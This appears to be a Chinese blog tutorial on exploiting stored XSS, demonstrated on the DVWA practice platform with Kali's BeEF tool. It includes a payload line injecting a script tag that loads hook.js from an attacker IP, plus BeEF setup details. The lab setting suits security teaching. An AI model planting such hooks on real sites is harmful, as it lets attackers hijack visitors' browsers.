存储型XSS的利用

一、存储型XSS漏洞利用原理

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本。

二、漏洞利用演示

(1)使用的工具

  1、DVWA漏洞演示平台

  2、攻击工具:kali中自带的Beef-xss

(2)漏洞利用过程:
  1、DVWA界面:

存储型XSS的利用

 

 

 2、beef-xss工具

  kali中自带此工具,打开终端输入beef-xss即可,首次使用需要修改默认的账号密码。若后期忘记密码可以查看配置文件/etc/beef-xss/config.yaml。登录地址为:http://127.0.0.1:3000/ui/panel

存储型XSS的利用

 

 

 

界面:

 存储型XSS的利用

 

 

接着根据beef-xss的提示在存在存储型XSS漏洞处插入恶意代码:<script src="http://<IP>:3000/hook.js"></script>,<IP>为攻击IP地址,然后等鱼上钩即可。

使用另一台测试机访问被插入恶意代码的网页,在beef-xss中就可以看到鱼儿上钩。

存储型XSS的利用

 

 

在beef-xss中有很多模块可以使用

存储型XSS的利用

 

 以上就是存储型XSS的简单利用。

 

上一篇:javascript-在three.js中将Z位置从透视图移到正交相机


下一篇:前端小姐姐私密社交网站信息丢失!原因竟是不经意间点开了一些网站